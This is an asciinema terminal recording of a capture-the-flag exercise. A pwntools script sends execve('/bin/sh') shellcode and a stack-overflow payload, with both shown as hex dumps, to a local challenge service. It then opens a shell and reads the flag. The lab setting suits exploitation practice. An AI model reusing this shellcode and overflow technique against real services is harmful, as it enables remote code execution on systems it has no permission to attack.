{"version": 2, "width": 120, "height": 30, "timestamp": 1752132286, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.768619, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                       \r \r"]
[0.771156, "o", "\u001b]2;root@chunk-core-1:/mnt/e/Projects/ctf101\u0007\u001b]1;..ojects/ctf101\u0007"]
[0.779205, "o", "\u001b]7;file://chunk-core-1/mnt/e/Projects/ctf101\u001b\\"]
[0.85629, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mctf101\u001b[00m \u001b[K"]
[0.856518, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[2.18149, "o", "asciinema rec pwn1-ww.cast "]
[2.190374, "o", "\u001b[27D\u001b[32ma\u001b[32ms\u001b[32mc\u001b[32mi\u001b[32mi\u001b[32mn\u001b[32me\u001b[32mm\u001b[32ma\u001b[39m\u001b[5C\u001b[4mp\u001b[4mw\u001b[4mn\u001b[4m1\u001b[4m-\u001b[4mw\u001b[4mw\u001b[4m.\u001b[4mc\u001b[4ma\u001b[4ms\u001b[4mt\u001b[24m\u001b[1C"]
[2.349883, "o", "\u001b[27D\u001b[32mp\u001b[32my\u001b[32mt\u001b[32mh\u001b[32mo\u001b[32mn\u001b[32m3\u001b[32m \u001b[32mp\u001b[39mwn1-e\u001b[4mx\u001b[4mp\u001b[4m3\u001b[4m.\u001b[4mp\u001b[4my\u001b[4m \u001b[24m\u001b[24m \u001b[24m \u001b[24m \u001b[24m \u001b[24m \b\b\b\b\b"]
[2.360532, "o", "\u001b[15D\u001b[32m3\u001b[39m\u001b[39m \u001b[39m\u001b[4mp\u001b[4mw\u001b[4mn\u001b[4m1\u001b[4m-\u001b[4me\u001b[5C\u001b[4my\u001b[24m\u001b[24m "]
[2.79776, "o", "\u001b[?1l\u001b>"]
[2.798489, "o", "\u001b[?2004l"]
[2.811483, "o", "\r\r\n"]
[2.813389, "o", "\u001b]2;python3 pwn1-exp3.py\u0007\u001b]1;python3\u0007"]
[3.359909, "o", "[x] Opening connection to 127.0.0.1 on port 3248\r\n"]
[3.36065, "o", "\u001b[A[\u001b[1m\u001b[34m◢\u001b[m] \r\n"]
[3.366199, "o", "\u001b[5G\u001b[AOpening connection to 127.0.0.1 on port 3248: Trying 127.0.0.1\r\n"]
[3.368218, "o", "\u001b[5G\u001b[A\u001b[KOpening connection to 127.0.0.1 on port 3248: Done\r\n"]
[3.368742, "o", "\u001b[A[\u001b[1m\u001b[32m+\u001b[m] \r\n"]
[3.48389, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x13 bytes:\r\n"]
[3.484947, "o", "    b\"what's your name: \\n\"\r\n"]
[3.485293, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x40 bytes:\r\n"]
[3.488087, "o", "    00000000  48 \u001b[34mb8\u001b[m 2f 62  69 6e 2f 73  68 \u001b[31m00\u001b[m 50 54  5f 31 \u001b[34mc0\u001b[m 50  │H\u001b[34m·\u001b[m/b\u001b[34m│\u001b[min/s\u001b[34m│\u001b[mh\u001b[31m·\u001b[mPT\u001b[34m│\u001b[m_1\u001b[34m·\u001b[mP│\r\n    00000010  \u001b[34mb0\u001b[m 3b 54 5a  54 5e \u001b[34m0f\u001b[m \u001b[34m05\u001b[m  41 41 41 41  41 41 41 41  │\u001b[34m·\u001b[m;TZ\u001b[34m│\u001b[mT^\u001b[34m·\u001b[m\u001b[34m·\u001b[m\u001b[34m│\u001b[mAAAA\u001b[34m│\u001b[mAAAA│\r\n    00000020  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA\u001b[34m│\u001b[mAAAA\u001b[34m│\u001b[mAAAA\u001b[34m│\u001b[mAAAA│\r\n    *\r\n    00000040\r\n"]
[3.495351, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x13 bytes:\r\n    b'try to overflow me~'\r\n"]
[3.496014, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x51 bytes:\r\n"]
[3.498326, "o", "    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA\u001b[34m│\u001b[mAAAA\u001b[34m│\u001b[mAAAA\u001b[34m│\u001b[mAAAA│\r\n    *\r\n    00000040  41 41 41 41  41 41 41 41  \u001b[31m00\u001b[m 50 \u001b[34m02\u001b[m \u001b[31m00\u001b[m  \u001b[31m00\u001b[m \u001b[31m00\u001b[m \u001b[31m00\u001b[m \u001b[31m00\u001b[m  │AAAA\u001b[34m│\u001b[mAAAA\u001b[34m│\u001b[m\u001b[31m·\u001b[mP\u001b[34m·\u001b[m\u001b[31m·\u001b[m\u001b[34m│\u001b[m\u001b[31m·\u001b[m\u001b[31m·\u001b[m\u001b[31m·\u001b[m\u001b[31m·\u001b[m│\r\n    00000050  \u001b[31m0a\u001b[m                                                  │\u001b[31m·\u001b[m│\r\n    00000051\r\n"]
[3.498879, "o", "[\u001b[1m\u001b[34m*\u001b[m] Switching to interactive mode\r\n"]
[3.500008, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\u001b[J"]
[3.500522, "o", "\u001b[?25l\u001b[?1h\u001b="]
[3.507776, "o", "\r\u001b[J[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x1 bytes:\r\n"]
[3.508409, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r"]
[3.508881, "o", "\u001b[J    b'\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[5.582661, "o", "\u001b[3Gl\u001b[7m \u001b[m\u001b[J"]
[5.939631, "o", "\u001b[3Gls\u001b[7m \u001b[m\u001b[J"]
[6.361065, "o", "\u001b[3G\u001b[Kls\r\n\u001b[J"]
[6.361519, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x3 bytes:\r\n    b'ls\\n'\r\n"]
[6.361915, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\u001b[J"]
[6.37294, "o", "\r\u001b[J[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x2c bytes:\r\n"]
[6.373624, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r"]
[6.374058, "o", "\u001b[J    b'bin\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'dev\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[6.374398, "o", "\r\u001b[J    b'flag\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[6.375584, "o", "\r\u001b[J    b'lib\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r"]
[6.376167, "o", "\u001b[J    b'lib32\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[6.377876, "o", "\r\u001b[J    b'lib64\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[6.378539, "o", "\r\u001b[J    b'libexec\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[J    b'sbofsc\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[Jbin\r\ndev\r\nflag\r\nlib\r\nlib32\r\nlib64\r\nlibexec\r\nsbofsc\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[7.276184, "o", "\u001b[3Gc\u001b[7m \u001b[m\u001b[J"]
[7.709333, "o", "\u001b[3Gca\u001b[7m \u001b[m\u001b[J"]
[7.857666, "o", "\u001b[3Gcat\u001b[7m \u001b[m\u001b[J"]
[8.380506, "o", "\u001b[3Gcat \u001b[7m \u001b[m\u001b[J"]
[8.829351, "o", "\u001b[3Gcat f\u001b[7m \u001b[m\u001b[J"]
[9.090821, "o", "\u001b[3Gcat fl\u001b[7m \u001b[m\u001b[J"]
[9.603621, "o", "\u001b[3Gcat fla\u001b[7m \u001b[m\u001b[J"]
[9.692944, "o", "\u001b[3Gcat flag\u001b[7m \u001b[m\u001b[J"]
[10.151946, "o", "\u001b[3G\u001b[Kcat flag\r\n\u001b[J"]
[10.153105, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x9 bytes:\r\n"]
[10.153766, "o", "    b'cat flag\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\u001b[J"]
[10.162883, "o", "\r\u001b[J[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x20 bytes:\r\n"]
[10.163562, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[10.164151, "o", "\r\u001b[J    b'AAA{R37_t0_guEs5_shE1Lc0d3_poS}\\n'\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\r\u001b[JAAA{R37_t0_guEs5_shE1Lc0d3_poS}\r\n"]
[10.16462, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[11.080984, "o", "\u001b[3G\u001b[K\r\n\u001b[J"]
[11.081601, "o", "[\u001b[1m\u001b[34m*\u001b[m] Interrupted\r\n"]
[11.128088, "o", "\u001b[?12l\u001b[?25h\u001b[?1l\u001b>"]
[11.129022, "o", "[\u001b[1m\u001b[34m*\u001b[m] Closed connection to 127.0.0.1 port 3248\r\n"]
[11.270535, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                       \r \r"]
[11.272982, "o", "\u001b]2;root@chunk-core-1:/mnt/e/Projects/ctf101\u0007\u001b]1;..ojects/ctf101\u0007"]
[11.280965, "o", "\u001b]7;file://chunk-core-1/mnt/e/Projects/ctf101\u001b\\"]
[11.321434, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mctf101\u001b[00m \u001b[K"]
[11.322024, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[11.402595, "o", "\u001b[?2004l\r\r\n"]
